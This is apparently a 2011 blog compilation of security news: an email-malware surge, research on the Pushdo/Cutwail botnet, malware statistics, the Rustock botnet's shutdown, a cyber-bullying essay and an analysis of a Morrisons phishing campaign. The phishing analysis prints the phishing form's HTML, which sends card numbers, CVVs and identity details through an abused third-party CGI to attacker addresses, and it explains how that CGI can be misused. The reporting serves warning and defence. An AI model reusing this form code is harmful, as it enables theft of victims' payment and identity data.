Sunday, 20 March 2011

Four Fold Increase in eMail-Based Malware

Recently Network Box have been noticing an unusual increase in eMail-based malware. They have not seen such an increase for several years, and this is occurring globally:

image

Four Fold Increase in Malware

More statistics can be seen at http://response.network-box.com/.

A glance at the malwares-per-hour statistics that our customer boxes are reporting clearly shows that the malware is coming in from hundreds of thousands of sources, in emails with varying subjects.
So far, Network Box heuristics such as NBH-BGTRACK and zero-day Z-scan protection systems are containing this increased threat. 

The increase is more than 4 times baseline, and all the samples that are being seen are emerging, never-before-seen, zero-day threats.

This increased activity is probably caused by botnet herders attempting to increase the size of their botnets, and this will probably be followed by a corresponding increase in spam levels.

Accordingly, Network Box have raised their alert condition to 3.  It might be that the recent decline in Spam may be reversed.

[InfoSecIsland]

Inside the Cybercrime Underworld: 100 Billion Spam E-Mails a Month

American and German researchers who infiltrated and crippled one of the world’s biggest spam-producing networks last summer have released a formal paper on the experience, and the numbers are staggering.

The Pushdo/Cutwail “botnet” sent out 1.7 trillion e-mails over 15 months (about 113 billion per month), had 100,000 enslaved “bots” around the world and had about 30 command-and-control servers in

Europe, North America and Russia.

Its Russian cybercriminal operators bought and sold e-mail addresses by the million and compromised PCs by the thousand, with lower prices for less-desirable countries and volume purchases.

[Read the original research paper here (PDF).]

"The interesting things were just the amount of spam that they were sending and how they operate like a professional business, with detailed statistics and error reporting,” Brett Stone-Gross, one of the researchers and a doctoral candidate at the University of California, Santa Barbara, told Kaspersky Lab’s ThreatPost blog. “This is a real business."

The 16 Pushdo/Cutwail servers that the researchers were able to access contained 2.35 terabytes of data, 24 databases full of details about operations and billions of target e-mail addresses.

The researchers estimate that the botnet’s operators have earned between $1.7 million and $4.2 million since June 2009.

Even one sub-botnet — Pushdo/Cutwail was divided into several domains, each under the control of one gang member — was able to pump out 87.7 billion e-mails in the four weeks between July 30 and August 25, 2010.

"I was most surprised by the sheer number of e-mails sent by this one botnet," another researcher, Thorsten Holz of Ruhr-University Bochum in Germany and Lastline, Inc., in Santa Barbara, told UBM TechWeb’s Dark Reading blog. "It turns out this one botnet sent out billions of spam messages."

Symantec Labs estimated last year that 89 percent of all e-mails are spam.


Takedown

The research team got service providers to pull the plug last summer on about 20 of Pushdo/Cutwail’s 30 command-and-control servers. (The other service providers refused.) The botnet was crippled for several months.

Botnets are illicit networks of computers that have been enslaved by malware, which burrows deep into their operating systems and opens “backdoors” that allow control by remote operators, or “bot herders.”
Malware infection usually happens when a user opens a compromised e-mail attachment (a Trojan) or visits a compromised website (a drive-by download).

The bots, ordinary machines scattered across the globe whose users have no idea they are infected, are used to send out spam touting Viagra and pornography, phishing e-mails and Trojans to harvest more bots.

Almost 40 percent of Pushto/Cutwail’s bots were in India, Holz and his colleagues found. Other countries’ shares were far lower; Australia came in second, comprising 9 percent of the compromised PCs.

Holz and his colleagues also got an archived copy of Spamdot.biz, an online forum used by botnet operators for communication and trade, which provided a fascinating look into the world of mid-level cybercriminals.

More than 90 percent of the posts on Spamdot.biz were in Russian, and less than 9 percent in English. It had nearly 2,000 registered members, who had to be recommended by at least two other existing members to be accepted.

E-mail addresses were bought and sold in blocks of a million, with prices ranging from $25 to $50 per block depending on geographical location, status (free Web-based e-mail services such as Gmail or Hotmail were cheaper) and volume.

Specialized groups sold services, such as infecting new batches of computers with the client’s malware. These sold in blocks of 1,000, with prices ranging from $13 for Asian computers to $125 for PCs based in the United States.


Top-notch software

The software used by the Pushdo/Cutwail botnet was remarkably sophisticated. Each server running Cutwail, the spam engine, constantly tested its messages against a built-in copy of the SpamAssassin e-mail filter.

Pushdo, the Trojan used for command and control, used a proprietary, and often encrypted, communications protocol to direct its bots.

Despite the technological efforts and the sheer volume of spam sent out, only 30 percent of Pushdo/Cutwail’s e-mails ever reached their target servers, the researchers estimate. Half went to invalid addresses, and nearly 17 percent were blacklisted.

"That's quite a big loss," Holz told DarkReading. "And even if the mail is received by the targeted mail server, with filtering and SpamAssassin a large chunk of that 30 percent gets filtered and doesn't necessarily reach the inbox of the user."

Still, having all this information isn’t much of a victory in the fight against spammers.

Pushdo/Cutwail has been rebuilt since last summer and is now back up to its pre-takedown size of about 100,000 bots. It’s the second-largest botnet in the world; the Rustock botnet has an estimated 250,000 enslaved PCs.

How can you prevent your computer from being enslaved by a botnet? No method is foolproof, but your odds of infection drop dramatically if you do two things: Don’t open any unrequested e-mail attachments, even those from friends; and install and constantly update and run anti-virus software, even if you’re using a Mac.

Using a Mac instead of a Windows PC also does help, at least for now. Macs are not immune from infection and a few Mac Trojans have been found in the wild, but Apple’s PC market share is still so small that most cybercriminals don’t bother writing malware for it.

[SecurityNewsDaily]

73,000 malware strains created daily in 2011

The number of threats in circulation has risen in comparison to last year. In the first three months of 2011, PandaLabs identified an average of 73,000 new malware strains, most of which were Trojans. Moreover, there was a 26 percent increase of new threats compared to the same period last year.



While PandaLabs observed a quarter-over-quarter increase of new malware in 2010, the rise was not nearly as notable as the one experienced over the last several quarters.

Trojans remain the most popular type of threat to computer systems, and now account for 70 percent of all new malware. This is unsurprising considering it can be incredibly lucrative for cybercriminals to commit fraud or steal money from Internet users through the online banking channel.


“The proliferation of online tools that enable non-technical people to create Trojans in minutes and quickly set up illegal business – especially when it can provide access to banking details - is responsible for Trojans’ impressive growth”, said Luis Corrons, technical director of PandaLabs.

Not all kind of Trojans grow at the same pace. Taking a look further at the subtypes of malware, PandaLabs found that Banker Trojans have decreased, bots have remained steady, and fake anti-virus or rogueware has descreased in popularity. However, the number of “downloaders” has increased significantly.

Downloaders are a subtype of Trojan that, once it has infected a user's computer, connect through the Internet to download additional malware. Hackers often use this method because the downloader is lightweight – only containing a few lines of code - and can go completely unnoticed unlike other Trojans.

[Net-Security]

How antivirus and antispyware help keep malware at bay

When it comes to creating Internet security threats, malware writers are masters of disguise and manipulation. They are constantly evolving their tactics to find new ways to trick PC users, steal their information, cause them financial harm.



Unfortunately, even if you're careful to avoid questionable websites and delete spam email immediately, viruses and spyware can still find you – and infiltrate your system without your knowledge.

Just a few of the activities that allow these forms of malware to find their victims include:
  • Sharing music, files or photos with other users
  • Downloading free games, toolbars, media players and other system utilities
  • Installing mainstream software applications without fully reading license agreements
  • Visiting media-supported websites that utilize tracking cookies.
How to tell if your PC is infected

If you're not sure whether your computer is infected with malware, Webroot suggests you keep your eyes peeled for these symptoms:
  • Sluggish performance
  • Increased number of pop-ups
  • New toolbars you can't delete
  • Unexplained changes to homepage settings
  • Puzzling search results
  • Frequent computer crashes.

Notorious spamming botnet Rustock shuttered

IDG News Service - A large network of hacked computers called Rustock, which was responsible for a great volume of spam, has shut down, perhaps as a result of another coordinated take down by security researchers.

Rustock's inactivity, first reported by security writer Brian Krebs on his blog, started on Wednesday when analysts noted that its command-and-control servers were offline.

Richard D.G. Cox, the CIO for the spam-tracking organization Spamhaus, said on Thursday morning that he was waiting for more information from U.S.-based colleagues about why Rustock is not working.

He noted that while it is possible that Rustock's decline is the result of another joint action by the security community, it could be that Rustock's operators are just reorganizing, since the botnet has slowed down before, he said.

"We are aware something is happening," Cox said.

The security company M86 wrote on its blog that Rustock completely stopped spamming, and its command-and-control servers would not respond.

"It is unclear yet who or what caused the shutdown," wrote Phil Hay, an analyst with M86. "It's also possible it has been abandoned. Over the past three years, Rustock has been responsible for a huge amount of spam, at times representing half of all spam caught in our spam traps."

Hay said that Rustock's spam output dropped after the closure of Spamit.com, a Russian website for e-mail spam affiliates linked to GlavMed, which ran the "Canadian Pharmacy" pharmaceutical spam campaigns.

Several botnets -- Pushdo, Waledac and Bredolab -- have come into the crosshairs of security analysts and law enforcement. Microsoft marshalled a group of security researchers that attacked Waledac in February 2010.

Waledac used a complicated peer-to-peer communication system, but researchers were able to disrupt it and take control of some 60,000 computers. Microsoft also went to court to shut down domains used by the botnet to communicate. But botnets are difficult to completely stop, and there are signs that Waledac has come back.

Last October, the Dutch High Tech Crime Team along with other organizations shut down 143 servers used to control Bredolab, which sent an estimated 3.6 billion e-mails a day. Armenian authorities, acting on a request from Dutch police, arrested a 27-year-old man accused of being Bredolab's controller.

Botnets manage to come back from shutdowns as code is modified by hackers and more computers become infected.

"Previous attempts at botnet shutdowns have tended to be short lived as the botnet herders simply regroup and start again," Hay wrote. "It's too early to say bye bye Rustock, but the thought is certainly nice."

[ComputerWorld]

Tackle cyber-bullying!

The other day, my husband and I were sitting al fresco enjoying a coffee, when I noticed a bunch of teenagers sitting at the table next to us. Most of them were fiddling about with their latest generation mobile telephones when I heard one of the girls comment: “You should not have interfered in Laura and Pedro’s relationship. It is none of your business what they do. You have most definitely overstepped the mark! She was reading out loud the comment she had just posted, when a couple other friends immediately posted further comments of the sort.

So what? Yes, I know, it does not have to turn into a nasty situation, but, then again, the opposite could happen very quickly. Because, as Mark Zuckerberg said at a technology conference hosted by TechCrunch: “Today, users are more comfortable sharing more information more openly. The social norms have evolved.” Fair enough, I fully acknowledge the advantages of social networks but, in the case of teenagers, they can be a double-edged sword and I cannot help but thinking how easy somebody’s reputation can publicly and rapidly be damaged. What is known as cyber-bullying or “the use of information and communication technologies to support deliberate, repeated, and hostile behavior by an individual or group, that is intended to harm others”.

Because, deep down, and paradoxically, as I am saying this from a blog :-) , I think social networks are the perfect tool to feed one’s ego. And the ego of a teenager is still “in progress”: they need to reaffirm their identity and because the visibility of they write is immediate, they can build their personality as they post along. Some of them actually find it easier to express their views by just hitting Send, or Post than by words. Through social networks, teenagers can get adherence to their comments, involve their allies and reinforce their role as a leader. Harassing the weaker teenager is not a new phenomenon, yet the Internet allows the harasser to take refuge in the comfort of anonymity. Social networks can take the role of the new “toilet wall” where teens used to write insults and names to annoy their colleagues.

It is tricky. Whenever I have mentioned to the parents of friends of my pre-teen daughter how important it is for us to keep an eye on how our kids behave on social networks and how it is vital to promote tolerance and civism, I very often get looks as to say: You control freak!

Well, all I can say is: would you not warn your baby if his fingers are dangerously close to an electric plug? To me, it is a question of sheer common sense because teenagers are very vulnerable yet adorable creatures (well, most times ;) ) What do you think?

Further information and useful links on cyber-bullying.

[ComputerSecurityArticles]

Morrisons supermarkets subject for phishing campaign

MX Lab, http://www.mxlab.eu, started to intercept phishing emails targettting the online activities of the Morrisons supermarkets.

The emails has the subject “New Morrisons Offer” and is sent from the spoofed email address “MORRISONS <noreply@morrisons.co.uk>” and has the folowing body contents:
This email is intended to inform you that there is a new offer at Morrisons Store.
This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.
In order to start the registration process please fill and submit the form attached to this email.
© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.
Attached to the email is the file Registration_Form.htm and once opened in a browser you will have the following screen:



The images and the web site style is taken from the official www.morrisons.co.uk web site but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.

When examing the form coding you will notice that this is in fact a CGI (Common Gateway Interface) exploit, or abuse, as well.

<form style=”margin: 0px;” action=”hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi” method=”post”> <input name=”data_order” type=”hidden” value=”first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
==================,document_type,document_no,issue_date,
==================,bank_name,name_on_card,card_number,exp_m,exp_y,cvv” />
<input name=”submit_to” type=”hidden” value=”adw.gray@gmail.com” />
<input name=”submit_by” type=”hidden” value=”abcdursulica@gmail.com” />
<input name=”form_id” type=”hidden” value=”Morrisons Fulls 3″ />
<input name=”ok_url” type=”hidden” value=”http://www.morrisons.co.uk/Offers/” />

These guys have figured out the values that the CGI needs in order to process the webform. It’s not too difficult either because at http://theburleyinn.co.uk/contact.html the CGI is called for a contact web form.

All the details are in the HTML page.

The major drawback on this CGI is that there is no control or check from where the CGI query will come from. It should be at least chech wether the CGI request is coming from the samen web site or local hosting server. If this is not the case it should reject the CGI request by default. It can be abused by anyone with some basic knowledge to send out for example a massive spam campaign.
Once the data is submitted on the phishing form, you will be redirected to the official site at http://www.morrisons.co.uk/Offers/.
Phishing attempts like this, where an HTML page is present as attachment instead of a embedded URL, are still being used. The main advandage is that it is more difficult to detect with technologies like Intent Analysis or SUBL that need an URL instead. But on the other hand, as a receiver of this kind of phishing emails, you should be more aware that these kind of emails are not to be trusted. No company in the world is sending you an attachment by email with the request to fill in your credit card details.


[Update March 14th, 2011 - 4:30 PM Local Belgian Time]

We have noticed new phishing emails coming from the spoofed email addresses:
offers@morrissons-discount.com

The attached HTML webform is requesting a CGI on a different server:

hxxp://www.janus-systems.com/cgi-bin/bnbform.cgi.

[ComputerSecurityArticles]